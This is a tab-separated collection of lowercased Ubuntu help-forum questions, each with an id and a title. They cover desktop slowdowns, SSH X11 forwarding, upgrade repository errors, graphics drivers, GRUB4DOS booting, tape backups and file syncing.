96014	disk i/o makes desktop unusable . system consumes too much memory	i have a long-term problem with my acer travelmate 3002wtmi ( pentium-m 1.73ghz , 512 mb ram ) and xubuntu 11.10 . whenever load increases machine tends to slow down to the point that it 's totally unresponsive ( for 10-30 sec . intervals which is very annoying ) . it always happens when i.e . gmail and youtube tabs are open with a browser.. i 've been running linux on desktop machines with less memory but i do n't recall having such problems , besides i chose to run xubuntu so it 's really hard to blame memory . nevertheless os reports this memory usage while only running xterm and default desktop ( after dropping vm caches ) : pkug @ travelmate : ~ $ free -m total used free shared buffers cached mem : 423 155 267 0 7 70 -/+ buffers/cache : 77 345 swap : 500 67 433 meanwhile process monitor tells that xfce itself eats just around ~17 mb . sometimes i do n't get why so much memory is used when just doing nothing . back to the original issue , is there anything i can do to prevent such slow downs ? i tried using different block scheduler , stuff like zramswap , tuning filesystem with data=writeback , experimenting with vm.swappiness ( currently it 's set to 10 ) .. not much of a help . here are the disk performance results : pkug @ travelmate : ~ $ sudo hdparm -tt /dev/sda /dev/sda : timing cached reads : 1624 mb in 2.00 seconds = 812.32 mb/sec timing buffered disk reads : 102 mb in 3.05 seconds = 33.48 mb/sec
96016	screen not locked after switching users with xscreensaver installed	i wanted some screensaver in addition to the default screen blanking . i installed xscreensaver from the softwarecenter & deinstalled gnome-screensaver using apt-get remove . most of it works fine but if i switch to user guest , the session of the account proper is no longer locked . i want this to be locked automatically in the same way as in gnome-screensaver . any idea ?
96018	x11 forwarding broken	i cant for the life of me get x11forwarding to work . i did everything 'by the book ' ... both client and server is running ubuntu 11.04 . both have ssh , vnc , x11 and fw ports open /etc/ssh/ssh_config forwardagent yes forwardx11 yes forwardx11trusted yes /etc/ssh/sshd_config x11forwarding yes x11displayoffset 10 apt-get install xauth xauth is already the newest version . installed tightvncserver ran xauth list rebooted connected with ssh server -xvl user echo $ display return blank xterm returns xterm xt error : ca n't open display : xterm : display is not set fw is open vncserver running sshd running x11 running ssh config files ok verbose output from ssh login shows all ok , no errors still nothing works ... so i did export display=localhost:10.0 then echo $ display returns localhost:10.0 but xterm returns xterm xt error : ca n't open display : localhost:10.0 now here 's the weird part . if i do export display=:0.0 then xterm gives no error , but no gui is displayed ... tried everything except reinstalling the os . even reinstalled ssh and copied fresh config files from a working install ... putting here the verbose output : user @ jupiter : ~ $ ssh -v -x user @ 192.168.0.1 env openssh_5.8p1 debian-1ubuntu3 , openssl 0.9.8o 01 jun 2010 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : applying options for * debug1 : connecting to 192.168.0.1 [ 192.168.0.1 ] port 22. debug1 : connection established . debug1 : identity file /home/user/.ssh/id_rsa type -1 debug1 : identity file /home/user/.ssh/id_rsa-cert type -1 debug1 : identity file /home/user/.ssh/id_dsa type -1 debug1 : identity file /home/user/.ssh/id_dsa-cert type -1 debug1 : identity file /home/user/.ssh/id_ecdsa type -1 debug1 : identity file /home/user/.ssh/id_ecdsa-cert type -1 debug1 : remote protocol version 2.0 , remote software version openssh_5.8p1 debian-1ubuntu3 debug1 : match : openssh_5.8p1 debian-1ubuntu3 pat openssh* debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_5.8p1 debian-1ubuntu3 debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug1 : kex : server- > client aes128-ctr hmac-md5 none debug1 : kex : client- > server aes128-ctr hmac-md5 none debug1 : sending ssh2_msg_kex_ecdh_init debug1 : expecting ssh2_msg_kex_ecdh_reply debug1 : server host key : ecdsa 31:52:3e:91 : b2 : b2:74 : cf:3e:65:37 : a7:78 : b9:3a:9e debug1 : host '192.168.0.1 ' is known and matches the ecdsa host key . debug1 : found key in /home/user/.ssh/known_hosts:4 debug1 : ssh_ecdsa_verify : signature correct debug1 : ssh2_msg_newkeys sent debug1 : expecting ssh2_msg_newkeys debug1 : ssh2_msg_newkeys received debug1 : roaming not allowed by server debug1 : ssh2_msg_service_request sent debug1 : ssh2_msg_service_accept received debug1 : authentications that can continue : publickey , password debug1 : next authentication method : publickey debug1 : trying private key : /home/user/.ssh/id_rsa debug1 : trying private key : /home/user/.ssh/id_dsa debug1 : trying private key : /home/user/.ssh/id_ecdsa debug1 : next authentication method : password debug1 : authentication succeeded ( password ) . authenticated to 192.168.0.1 ( [ 192.168.0.1 ] :22 ) . debug1 : channel 0 : new [ client-session ] debug1 : requesting no-more-sessions @ openssh.com debug1 : entering interactive session . debug1 : requesting x11 forwarding with authentication spoofing . debug1 : requesting authentication agent forwarding . debug1 : sending environment . debug1 : sending env lang = en_us.utf-8 debug1 : sending command : env debug1 : client_input_channel_req : channel 0 rtype exit-status reply 0 debug1 : client_input_channel_req : channel 0 rtype eow @ openssh.com reply 0 shell=/bin/bash xdg_session_cookie=5867400390852a975845598400000005-1329602079.30299-1173119600 ssh_client=192.168.0.14 34691 22 user=user ssh_auth_sock=/tmp/ssh-bpynw11158/agent.11158 mail=/var/mail/user path=/usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games pwd=/home/user lang=en_us.utf-8 shlvl=1 home=/home/user logname=user ssh_connection=192.168.0.14 34691 192.168.0.1 22 _=/usr/bin/env debug1 : channel 0 : free : client-session , nchannels 1 transferred : sent 1960 , received 1968 bytes , in 0.1 seconds bytes per second : sent 19601.4 , received 19681.4 debug1 : exit status 0
96022	update manager can not find repos when upgrading to 11.10	i can not seem to upgrade from 11.04 to oneiric because : error during update a problem occurred during the update . this is usually some sort of network problem , please check your network connection and retry . w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/oneiric-security/multivers/binary-amd64/packages 404 not found [ ip : 91.189.92.167 80 ] , w : failed to fetch gzip : /var/lib/apt/lists/partial/security.ubuntu.com_ubuntu_dists_oneiric-security_main_binary-i386_packages hash sum mismatch , w : failed to fetch gzip : /var/lib/apt/lists/partial/security.ubuntu.com_ubuntu_dists_oneiric-security_universe_binary-i386_packages hash sum mismatch , e : some index files failed to download . they have been ignored , or old ones used instead . now i thought i would check my network connection despite the fact that it could find every other package and it ofc returned that my network was fine . so i decided to ping the ip of this package location myself ( 91.189.92.167 ) and got : ping 91.189.92.167 ( 91.189.92.167 ) 56 ( 84 ) bytes of data . 64 bytes from 91.189.92.167 : icmp_req=1 ttl=128 time=40.5 ms 64 bytes from 91.189.92.167 : icmp_req=2 ttl=128 time=39.6 ms 64 bytes from 91.189.92.167 : icmp_req=3 ttl=128 time=41.0 ms 64 bytes from 91.189.92.167 : icmp_req=4 ttl=128 time=38.7 ms 64 bytes from 91.189.92.167 : icmp_req=5 ttl=128 time=41.1 ms 64 bytes from 91.189.92.167 : icmp_req=6 ttl=128 time=38.6 ms -- - 91.189.92.167 ping statistics -- - 6 packets transmitted , 6 received , 0 % packet loss , time 5009ms rtt min/avg/max/mdev = 38.658/39.967/41.195/1.038 ms which meant everything was dandy on that side . so i thought maybe the host can not be resolved so i did host -v : sam @ ubuntu : ~ $ host -v security.ubuntu.com trying `` security.ubuntu.com '' ; ; - > > header < < - opcode : query , status : noerror , id : 30243 ; ; flags : qr rd ra ; query : 1 , answer : 2 , authority : 0 , additional : 0 ; ; question section : ; security.ubuntu.com . in a ; ; answer section : security.ubuntu.com . 5 in a 91.189.92.167 security.ubuntu.com . 5 in a 91.189.92.166 received 69 bytes from 192.168.153.2 # 53 in 37 ms trying `` security.ubuntu.com '' ; ; - > > header < < - opcode : query , status : noerror , id : 42468 ; ; flags : qr rd ra ; query : 1 , answer : 0 , authority : 1 , additional : 0 ; ; question section : ; security.ubuntu.com . in aaaa ; ; authority section : ubuntu.com . 5 in soa ns1.canonical.com.hostmaster.ca nonical.com . 2012011402 10800 3600 604800 3600 received 98 bytes from 192.168.153.2 # 53 in 39 ms trying `` security.ubuntu.com '' ; ; - > > header < < - opcode : query , status : noerror , id : 23755 ; ; flags : qr rd ra ; query : 1 , answer : 0 , authority : 1 , additional : 0 ; ; question section : ; security.ubuntu.com . in mx ; ; authority section : ubuntu.com . 5 in soa ns1.canonical.com.hostmaster.ca nonical.com . 2012011402 10800 3600 604800 3600 received 98 bytes from 192.168.153.2 # 53 in 40 ms which again looks just dandy so i am stuck with thinking that for some reason it has to be something with : hash sum mismatch , e : some index files failed to download . they have been ignored , or old ones used instead . so i did a little searching and found a problem with ppa repos : update manager refuses to update but the thing is i am not using ppa so that cant be my problem . does anyone know what else could be stopping me from upgrading my ubuntu ? maybe i am overlooking something that is right in front my eyes and its just past my bed time , either way i am totally stumped . thanks , edit : also when i try and do a sudo apt-get update now i get : err http : //security.ubuntu.com oneiric-security/multiverse amd64 packages 404 not found [ ip : 91.189.92.167 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/oneiric-security/multiverse/binary-amd64/packages 404 not found [ ip : 91.189.92.167 80 ] e : some index files failed to download . they have been ignored , or old ones used instead .
96026	what is the difference between jobs and services ?	so what are the differences between jobs that are located in /etc/init/ , which i call by writing start myjob , versus a service which i call by sudo service aservice reload ? thanks
96031	how do i get my bamboo capture tablet working ?	as far as i know , only the first generation wacom bamboos work out of the box . but i use a third generation one ( a bamboo capture to be exact ) what must i do to get a working driver ? if it helps , i 'm using the x64 edition
96032	xubuntu or lubuntu on a mac mini ?	my mac mini does n't have sufficient hardware for ubuntu 11.04 ( specifically unity i think ) , and so i have to use the classic environment , which is fine , but it seems to run slower on 11.04 ( i 'm upgrading now to 11.10 ) . however , i heard on powerpcfaq that if it runs slow i should use xubuntu or lubuntu . so my question is : what is the best way to upgrade from ubuntu 11.10 to xubuntu or lubuntu and which one would be better for a late 2005 model mac mini ppc ?
96033	wicd tray icon fails to appear in system notification area even though in dconf > desktop > unity > panel/whitelist	i 'm trying to get the wicd ( replacement for non-functional network manager ) icon to show up in my laptop 's systray/notification area . the solution that worked for 11.04 ubuntu/unity does not work for 11.10 ubuntu/unity . apparently the whitelist is ignored , as skype shows up in the systray but is not in the whitelist . this is a showstopper for ubuntu on this laptop . update : i am running 3d and the whitelist is ignored .
96035	application indicator + entry widget	i would like write my own application indicator via guide in http : //unity.ubuntu.com/projects/appindicators/ ( in python ) my question - is there any chance add next to icon indicator entry widget ( see below ) on top panel ? ( window = gtk.window ( gtk.window_toplevel ) vbox = gtk.vbox ( false , 0 ) window.add ( vbox ) vbox.show ( ) entry = gtk.entry ( ) entry.set_max_length ( 50 ) entry.set_text ( `` hello '' ) vbox.pack_start ( entry , true , true , 0 ) entry.show ( ) window.show ( ) ) thanks
96036	how to convert a configured ubuntu system to an unlimited iso ?	preface : my initial thought process/approach may totally be the wrong way to go about what i 'm trying to accomplish , so please feel free to modify this post moderators . in my excitement of discovering how amazing ubuntu is , i have been installing it on every computer i own , as well as installing and configuring it for friends and family . one thing that is unique about this process is that i 've been doing the exact same thing with every installation ( installing the same software and configuring the same tweaks such as specific icons , cursors , themes , etc ) . initially , i got tired of how long this process was ( several hours ) , so i documented the procedure and the involved steps , which reduced the necessary time considerably . however , i would like to simplify this even further by somehow incorporating the functions of imaging and redeploying . i initially considered tools like remastersys , uck , etc , but these are all limited ( particularly that they limit the user by only being able to create a single disc iso , at least from what my research has shown ) . my goal is that i could install and configure ubuntu exactly the way i want it to be , and then somehow redeploy this perfected installation over and over again to other computers without any fuss . since my completed ubuntu setup takes up much more space than a dvd , my plan would be to incorporate an external usb hard drive to help facilitate this `` redeploy '' . this is also why i named my question using `` unlimited iso '' ; i was n't sure if i could possibly convert the entire system to a very large iso file ( or some kind of image file ) that could be read by another installer . this iso file could be 20gb+ in size , based on the files i 've added/installed to the base machine . i hope the description of my goal has n't been conveyed in a confusing way . again , in a nutshell , i 'd like to setup an ubuntu system , configure everything the way i want it , then `` snapshot '' this system and/or combine it with some kind of installer that can be used to redeploy this exact installation to other computers without any problems . is this possible ?
96039	can not save pdf file with inputs , error message `` document is encrypted ''	i have inserted inputs to a form given as a pdf file . using evince document viewer 3.2.1 on ubuntu 11.10 , there is no problem with inserting inputs to the form and to print the result . but it is not possible to save the pdf file with inputs ( as a new file ) and the following error message is given : the file could not be saved as `` file : ///home/username/downloads/file.pdf '' document is encrypted note for the message above that if i try to save the file in a different folder ( e.g . documents ) , the error message is still referring to the downloads folder . how to save the pdf file with inputs ? p.s . i know that similar questions are in the database , but i have not seen a similar error message in previous questions
96042	deja-dup for backups , ubuntu one for file sync - question on plans	i 'm not sure if i understand correctly , so asking . i often forget to back up my laptop . usb drive not connected , or doing something else , or ... . so , i decided to synch to ubuntu one . on reading up , however , it looks like i want to go into settings , enable backups , and backup once weekly to ubuntu one . i did so , and am happily backing up - knowing i will toast a harddrive or decide to format and go again . so - deja-dup is for backups , and i do this in settings , and if my /home directory is bigger than 5 gigs , i should pop for the 20 gig increment ? or are backups priced differently ? my mobile phone does not have a data plan . i use it as an mp3 player , and manage it with banshee . so i just use banshee and a usb cord to sync music . my 5 gigs and 1800 or so mp3 's do n't need to be synched . if i wanted to , though - i might consider synching my documents and pictures directories . but i 'm not really synching to any other devices , so i 'm really only keeping an online folder mirroring my laptop folders , right ? so , even if i 'm only synching a gig or so of data , i might need to pop for the 20 gig increment if i want to backup my home directory weekly , right ?
96044	pairing bluetooth device with fixed non-numeric key	i want to use a bluetooth modem that has a fixed key with numbers and letters . unfortunately ubuntu allows me keys with numbers only . there is no way to change the key of the modem ( hexadecimal serial number ) . how can i pair it with ubuntu 11.10 ?
96045	appmenu for other window managers/desktops	i 'm looking for an appmenu like this one for kde to be used with gnome or openbox or any other . it provides a app menu in one button on the titlebar . i have tried using kde window manager in gnome not very good .
96055	can a unity dash display be made persistent	is it possible to make a dash display persistent ? . often it is necessary to look at several of the listed results , when an item is selected the dash disappears and this requires repeating the dash search . for example the unity-lens-books lens searches for ebooks found in a number of online sources ( for me a very useful lens ) . often one needs to look at several of the results to find what one is looking for . this requires the search to be repeated for every selected book which is an annoying waste of time . [ correction - i am wrong , the book lens does keep the search results between selections . i became confused over this because because when making a selection from a dash lens , clicking the dash icon again takes you to the `` home '' lens . however , the probem still applies to other lenses . ] would it not be better to make the dash result a permanent display rather than an overlay .
96059	list files that were changed between a certain datetime	how can i list all files recursively in a directory that were changed within a certain timespan ? like between 23.12.2011 and 25.12.2011 ?
96060	contact sync ubuntu one on windows	hi i 'm running ubuntu one on three computers two of which run ubuntu 11.10 and one running windows xp pro . all are able to sync the ubuntu one folder . the two running ubuntu / thunderbird successfully sync contacts but with thunderbird running on windows no ubuntu one folder appears in the list of address books . how do i check this out ... or is it even possible ? thanks colin .
96061	how can i move files across network ? -- unattended / handles errors without waiting for user input ?	i am occasionally moving lots of files around ( 50+ gb ) from one hdd to another over my lan . this takes a while . i often come back to find that it stopped somewhere waiting for user input when there is a problem with a particular file ( cancel , skip , skip all or whatever ) . i could of course just wait for the first error and select 'skip all ' but that is a very bad solution - no logging , have to wait . i am doing this in nautilus . i know there has to be a better way ( s ) to do this . i would like to be able to automatically skip all the problematic files and generate a log file that would tell me what files were n't moved and what the problem with each of those files was . is there a tool or script that will do this ?
96062	how to make workplace selector 2x2 instead of 4x1 ?	i 'm having a problem with workplace configuration - it appears as a 4x1 box when i do ctrl+alt+→ . i have 2x2 box at the other installation ( was that way since the start ) , so how can i make it this way instead of 4x1 ?
96063	ubuntu does n't detect my ati vga card , only intel , using 'lspci | grep vga ' & 'sudo lshw -c video '	i 'm sporting a lenovo g570 laptop with a dedicated ati radeon ( 6347 ) hd 1gb vga card for the last 5 days i 've been trying to install ati proprietary drivers to make full use of it : i tried almost every way there is & continuing with this method however , when installing the packages & typing sudo aticonfig -- initial -f ; i get the error that no supported devices detected . using lspci | grep vga & sudo lshw -c video to determine what vga cards are detected , it only shows that the system detects only the integrated intel graphics card , not the ati hd dedicated card . help please ? edit solved sorry to bother y'all , i turned it off by mistake from bios ; i did n't know coz my bios had only 2 options : switchable graphics or uma adapter ( integrated intel ) thanks for the help : )
96070	ccsm does n't work when changing launcher visibility or number of workspaces	the compizconfig setting manager does n't work on my 11.10 installation of ubuntu . i 've tried setting the launcher panel visibility to `` never '' and changing the number of workspaces in the virtual box , but it does n't affect the actual system , not even after rebooting . i have the same setup on a desktop pc and there everything is just working - this problem only appears on the laptop . i 've tried unity -- reset and compiz -- replace to no avail . i would be very thankful for any suggestions on how to get it working update : ok , so i 've dug a bit more and it seems that i 'm running unity 2d . it stays that way regardless of what i select at the login screen
96074	how do i navigate and select menu options when using gmameui ?	i am using 11.10 . i installed mame and gmameui from the software center . downloaded a couple of roms . when i try to play a game i hit tab to find out the key bindings . i get a menu shown ( input general , input this game etc ) but dont seem to be able to select any options or navigate the menu . any ideas ?
96078	ubuntu does not recognize my nvidia gpu driver	i installed the driver from additional drivers i can run nvidia configuration utility which recognises the gpu but when i go to system info it says driver : unknown experience : standard also when i move windows around the desktop they move slowly or they will only move to final position when i stop moving the mouse also cpu usage rises significantly when moving a window ( by 50 % on 1st core and 40 % on second )
96080	how to set google chrome as the default browser ?	how can i set google chrome as the default browser ? if i set it in the browser settings , nothing happens . the browser says it 's default , but in preferred applications in gnome , there 's only firefox to choose from . clicking any link i.e in thunderbird opens a blank firefox window , not with the link embedded . can i set the default browser in dconf2 or any configuration file ?
96084	how to install beatbox ?	i have a problem with installation of beatbox music player in ubuntu 11.10 . when i tried to install the software , i could not install it because i needed a lib called libgranite0 . i tried entering the following commands in a terminal : sudo add-apt-repository ppa : sgringwe/beatbox sudo add-apt-repository ppa : elementaryart/elementarydesktop sudo apt-get update sudo apt-get install beatbox but those commands do not work ! they required me to have libgranite0 installed but i do n't know how to install that . i tried searching in google but i could n't find how to install this package . i want to know if there is a way to install this dependency so that i can install beatbox media player .
96087	glut install not working	i currently installed ubuntu 11.10 on my acer netbook overwriting my previous windows starter os and am having a problem getting some packages i need for an upcoming class . i am using the most updated version and have a wifi connection on my campus . this is what my instructor wishes for us to do : select applications/accessories/terminal on the ubuntu desktop type ls /usr/include/gl if glut.h gl.h etc are there , great if not , if you are root ( prompt # ) type apt-get install libglut3-dev if asked , answer yes if you are a user login , type sudo apt-get install libglut3-dev i then copied program1.c to the desktop if needed you can e-mail files to yourself and use ubuntu web browser to retrieve cd desktop gcc -lglut -lglu program1.c note l is a lower-case l , which means library in unix ./a.out to execute i complete step 2 , in which returns : sudo : ls/brandon/include/gl : command not found so from here i do the apt-get and try to install it but returns me with this : e : unable to locate package libglut3-dev does this have to do with my connection or is there something i need to be doing on my system for it to find the package and install it . i 'm really new to ubuntu and could use some help just getting started .
96091	can people sell ubuntu on ebay ?	tired of windows and was told by a workmate about ubuntu . sounds promising ! i ran across a couple of ebay sellers that are selling ubuntu . i thought that was prohibited ? do you think that this is a fake ubuntu with viruses ?
96097	get error on boot - fresh install	i just loaded ubuntu 11.10 as a fresh install . i am getting a error `` hd0 out of disk '' , press any key to continue '' . the system seems to still load fine . i just do n't like getting errors even before the boot .
96106	blocked port 5000 ?	i am trying to use my ubuntu laptop with a heroku hosting ( it 's a kind of vps hosting ) . their support says my port 5000 is blocked . any way i can check it ? does it make any sense ? is it my pc , or my router ? any help is greatly appreciated ! alex
96110	is there a way to do a ' ls -r | grep `` aname '' * | rm ; to remove multiple files in multiple directory	i have installed ( compiled ) emerald . the command make uninstall did n't work ( there is no makefile as it is just a script ) . so i decided to remove the file manually . but there were a lot of files . i 've tried some things but it did n't work . so i came here to ask for some advice . is there a command with ls -r | grep blabla* that i can add to display file directory ( it only displays filename ) is there a true ls -r | grep bla* | rm ?
96114	how to set nvidia overscan to persistent after reboot ?	stats of what i 'm running : tv : hp mediasmart tv 47 '' / os : ubuntu 10.10 64-bit / video card : nvidia geforce gt 220 / video driver : nvidia 260.19.06 when i first setup ubuntu on this computer , after rebooting , the display resolution did not save . i eventually fixed this by manually changing the display to the correct resolution in the xorg.conf file . but i 'm still unable to make the overscan setting persist after a reboot . i 've tried adding nvidia-settings -l to my autostart , but this does nothing . i 've also run the nvidia settings app with sudo and saved the changes , but this has n't fixed the issue either . i also noticed that there is a .nvidia-settings-rc file in my home directory that stores settings and there is a field htpc64:0.0/overscancompensation [ dfp-1 ] =115 which is correct , but this file and/or settings related to it do n't seem to be saving because i still have to manually adjust the overscan in the nvidia settings after a reboot . what else can i do to resolve this ?
96117	which hardware upgrade will give me the greatest performance boost with ubuntu 11.10 ( with list of currently installed hardware ) ?	i have the following components in my computer : https : //docs.google.com/spreadsheet/ccc ? key=0arazbkogrxebddhjc1ljwkljmev5rlvrdzvychdmywc the system currently works okay with ubuntu 11.10 and unity . it just seems a little clunky . which hardware upgrade would give me greatest performance boost in ubuntu 11.10 ?
96118	how do i get va-api and xvba to work ?	i have a radeon hd 6310 in a mini-itx motherboard that i am trying to use for a htpc . i need to figure out how to get va-api and xvba to work so my ati card can do all the heavy lifting and i can once again watch 720p/1080p content . i 'd like to use xbmc as the front end , but i could probably code something that could work with vlc . to clarify , i am interested in how to get a media player to use the hardware acceleration , which the answer in the comments does not address .
96126	unity slow with dual-monitor	with single-screen , unity is fast in opening apps , switching between opened apps , etc . when i use dual-monitor then i see considerable drop in performance in the above mentioned areas . overall system performance comes down to a crawl . i opened the same apps when using both single and dual-monitor . is it a know bug ? i 'm on 11.10 .
96129	sudo apt-get install -f does n't fix broken packages . and now ?	$ sudo apt-get install -f [ sudo ] password for ... : lendo listas de pacotes ... pronto construindo árvore de dependências lendo informação de estado ... pronto corrigindo dependências ... pronto os seguintes pacotes foram instalados automaticamente e já não são necessários : python-pyasn1 libconfig++8 python-twisted-runner linux-headers-3.0.0-12 libvamp-sdk2 python-twisted-mail libgnomecanvasmm-2.6-1c2a python-twisted-lore python-twisted-conch python-twisted-news python-twisted-words python-twisted libffado2 linux-headers-3.0.0-12-generic libaubio2 use 'apt-get autoremove ' para removê-los . os pacotes extra a seguir serão instalados : libmpeg3cine os novos pacotes a seguir serão instalados : libmpeg3cine 0 pacotes atualizados , 1 pacotes novos instalados , 0 a serem removidos e 0 não atualizados . 2 pacotes não totalmente instalados ou removidos . é preciso baixar 0 b/2.573 kb de arquivos . depois desta operação , 6.762 kb adicionais de espaço em disco serão usados . você quer continuar [ s/n ] ? s ( lendo banco de dados ... 317732 ficheiros e directórios actualmente instalados . ) desempacotando libmpeg3cine ( de ... /libmpeg3cine_1 % 3a2.2-0.3~ppa1~oneiric1_i386.deb ) ... dpkg : erro processando /var/cache/apt/archives/libmpeg3cine_1 % 3a2.2-0.3~ppa1~oneiric1_i386.deb ( -- unpack ) : a tentar sobre-escrever '/usr/bin/mpeg3cat ' , que também está no pacote mpeg3-utils 1.5.4-5ubuntu1 erros foram encontrados durante o processamento de : /var/cache/apt/archives/libmpeg3cine_1 % 3a2.2-0.3~ppa1~oneiric1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) ... .. : ~ $ apt-get autoremove e : não foi possível abrir arquivo de trava /var/lib/dpkg/lock - open ( 13 : permissão negada ) e : não foi possível travar o diretório administrativo ( /var/lib/dpkg/ ) , você é root ?
96130	i ca n't configure my networks or use my wifi adapter	i 'm dual clienting windows vista and ubuntu 11.10 , and i have it set to where i can choose which i use at startup . now the problem i 'm having is that i use and external usb wireless adapter and i ca n't figure out how to either install the program that runs it or even make ubuntu find it . the adapter works fine in windows but until i figure out how to make it work in ubuntu i ca n't update or even really use it there . i have crossover saved to the hdd but i truthfully do n't know how to make ubuntu install it . and before i forget i 'm using a netgear n300 wireless adapter model wna3100 . any help would be greatly appreciated .
96131	how to restore application launcher ?	i played around with compiz manager , for some reasons , the unity disappeared . now it only shows my desktop . i tried to open terminal using ctrl-shift-t but it does n't work at all . click on help , it 's just freeze . in fact , double-click on anything would make it freeze ! i 've just installed 11.10 couple hours ago . the only thing i can do now is right click on desktop and change desktop background : ( . what can i do ? i wish i never upgraded to 11.10 !
96145	starcraft 2 errors out with mmdevapi even though i disabled it	starcraft 2 errors out with mmdevapi.dll even though i disabled it in the winecfg . i am using playonlinux to run starcraft . i disabled mmdevapi library in winecfg and in the winecfg in playonlinux . its when i debug i notice all the errors . game starts and loads , gets to login screen but the colors are all messed up then crashes .
96153	problem in configuring new monitor	i have a ubuntu 11 installed in my dell vostro . i just connected a new dell 20 '' lcd as my second monitor . but after i connect it , the screen goes blank.i even tried reconfiguring the xserver and even restrarting it . but nothing helped . can anyone help me out with the problem . video card : 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) thanks nishant shrivastava
96154	nexus s 4g not detected by computer	a little bit of a disclaimer , i have very little knowledge of the correct terminology for some of the things i 'm going to ask about , and i apologize in advance i have a nexus s 4g phone that is , at the moment of writing , connected to my 11.10 computer through its usb charger cable . in the past , connecting the phone like this has allowed me to transfer files between my computer and my phone ; i 'm able to get my music onto my phone , and my photos onto my computer , for example . for some reason , this has stopped working . my phone still charges its battery when connected to the computer , but neither the computer nor the phone recognized that they are connected . is there something i can do to get the phone and the computer to detect each other ? i do n't know how to fix this , and it 's more than a little frustrating . any help would be greatly appreciated .
96156	ca n't copy files	when i right click on a file or folder the cut/copy options grey out . i tried using : $ gksu nautilus but when i tried to change the file permissions it just reverted back . some times it says error setting file permissions . read only file system or something like that . do i have to remount the drive as r/w or is there any other way ? a link would also be sufficient .
96159	( tar : /dev/nst0 : can not read : can not allocate memory ) with tar , pv and tape drive	i 'm trying to use pv ( pipeviewer ) along with tar to do tape backups in order to see the progress and eta like so : du -s /home/myuser 115630916 /home/myuser tar -cf - /home/myuser/ | pv -s 115630916 > /dev/nst0 which works fine , it writes to tape successfully . but once i try and test the tar archive : mt -f /dev/nst0 rewind tar -tvf /dev/nst0 i get the following errors : tar : /dev/nst0 : can not read : can not allocate memory tar : at beginning of tape , quitting now tar : error is not recoverable : exiting i 've googled around and there have been suggestions that i use -- blocking-factor=128 when creating my backup and restoring . i still get the same error . it 's also worth noting that if i just use tar , everything works 100 % , including the restore , so perhaps pv is breaking it ?
96160	when you install gnome , do you still have access to ubuntu standard desktop ?	i recently installed gnome-fallback-session because it is a lot like ubuntu classic for 11.10 - my question is , am i able to go back to using the standard ubuntu gui that came out of box as well as gnome ? or am i permanently stuck with gnome ?
96161	how to update libreoffice to the latest version ?	i 'm new to ubuntu . i 've ubuntu 11.10 with libreoffice 3.4.4 installed . but , i heard that is a newer version of libreoffice 3.4.5 . how can i update to this version ?
96170	how to build binary packages in launchpad ?	i have a launchpad account and a ppa . i have just uploaded a source package using dput . is it possible to instruct the launchpad build machine to build binary packages ?
96172	intel 845gl graphics driver issues	the screen divides into 4 segments after ubuntu 11.4 or 11.10 is installed on the hdd . this issue does not show up when running from cd . is there a quick way to tell ubuntu 11.10 to use the same driver used from cd ? the issue is exactly same as reported here : fixing display issues on intel 82845gl but none of the answers posted there solved the issue . any help for a newbe ?
96173	desktop icons move around on boot	when i boot ubuntu 11.10 sometimes on boot the desktop icons move places ! for example , i have several icons placed near the bottom of the screen . when i boot these icons have moved up the screen about 3 rows . can anyone tell me why ? and how to stop this ?
96175	why i am taken to grub4dos when selecting ubuntu from the boatloader menu ?	i recently installed ubuntu 11.04 64x alongside windows 7 ( ubuntu after windows 7 ) on my laptop . ubuntu installed properly without any errors . when i booted the first time , i did n't see grub menu which should have come by default as ubuntu overwrites winloader . instead i saw windows boot menu , which did not have an ubuntu entry . so i added ubuntu to the menu from windows using easybcd . i started seeing ubuntu in the menu . no problem till here . but when i select ubuntu from the menu , i am taken to the grub4dos prompt . after a lot of research on the web i found a way to boot into ubuntu using commands . this is what i do everytime to boot into ubuntu : > root ( hd0,4 ) > kernel /boot/vmlinuz* root=/dev/sda5 ro > initrd /boot/init* > boot then i found that such problem occurs due to corrupt grub and used the method here to restore it but no use does anyone know why i am taken to grub4dos on selecting ubuntu from the menu or at least how to run a shell script ( containing the above commands ) from grub4dos so that i do n't have to rewrite those commands repeatedly .
96176	how can i migrate an application from github to launchpad ?	i am working on a new ubuntu application . i would like to migrate it from github to launchpad . the reason why i added it to github and not to launchpad is that i had some issues saving it with quickly ( some bzr-related problem probably ) . so i deleted my .bzr folder . what is the easiest way to add it to launchpad and bzr now ?
96179	help building pygtk application	this is my application . it is created with quickly . i would like to package it for ubuntu now . i tried to package it with uickly , but that failed . at first , i was trying to install it using setup.py . but it is only copied in python lib dir , no icon , no desktop file installed . then i tried to follow this guide , but i ended up with package without icon and it was of bad quality , but most important of all , it does not use setup.py , and it was pretty complicated . i would like to automate packaging process can someone point me in the right direction , some examples of existing apps that have automated packaging etc ? thanks in advance .
96181	how do i copy the whole history of the clipboard to a text file ?	i would like to paste my whole clipboard history consisting of words copied ( ctrl+c/by selection ) during my reading sessions . i installed programs like glippy and clipit but i could n't figure out how to paste all the words , if ever exists such an option in these programs , i copy to a simple text file at once , not one word at a time . can someone help me out ? thank you !
96184	i need help on setting up my work environment	i 'm having trouble planning how i should store and access my files ! i need a good way to ensure that i always have backups ( which are browseable ) and access to my files from different computers . my network looks like this ... server on my local file server i have /mnt/storage/home /mnt/storage/backup storage is a 2tb internal hard disk . i also have /mnt/storage_mirror/ which is a 2tb external hard disk that i 've planned to be a mirror for the internal hard disk so that i always have a backup if one of the hard disk fails . is it stupid to use a mirror instead of incremental backups ? i mean , what will happen if something gets corrupt ? is there a better alternative than rsync to use for mirroring ? clients i was planning to access these files through samba on both my ubuntu laptop and my windows desktop . preferably i want to have /mnt/storage/home/niklas mounted on my local home folder but i do n't know if that is possible or if it is very wise ? what will happen if i do n't have connection to the server ? the desktop with windows installed will also dual-boot ubuntu studio and there i was planning on having my work files locally for maximum performance and at every shutdown sync them to the fileserver . i 'm worried that i 'll have trouble browsing and working with photographs from my laptop when i always have to load them from the server . my wireless network uses the n protocol so i think it 'll be fast enough . what do you think ? would this be a good set up ? please come with tips and suggestions on things to improve . can i utilize technologies like sparkleshare to get a better set up ?
